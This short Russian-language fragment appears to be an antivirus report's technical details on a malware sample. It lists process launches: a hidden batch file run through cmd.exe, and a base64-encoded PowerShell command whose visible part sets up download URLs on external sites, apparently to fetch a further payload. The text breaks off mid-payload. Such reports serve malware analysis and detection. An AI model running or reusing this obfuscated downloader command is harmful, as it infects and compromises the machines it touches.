Техническая информация
- '<SYSTEM32>\cmd.exe' /c %ALLUSERSPROFILE%\yksds.bat
- %ALLUSERSPROFILE%\yksds.bat
- '<SYSTEM32>\cmd.exe' /c %ALLUSERSPROFILE%\yksds.bat' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enc JABzAHQAcgBzAD0AIgBoAHQAdABwADoALwAvAGIAbwBhAHIAZABpAG4AZwBzAGMAaABvAG8AbABzAG8AZgB0AHcAYQByAGUALgBjAG8AbQAvAFYAaQBuAGUAZQB0AF8AQgBhAGMAawB1AHAALwBaADkAbwAzAC8ALABoAHQAdABwAHMAOgAvAC8AdABl...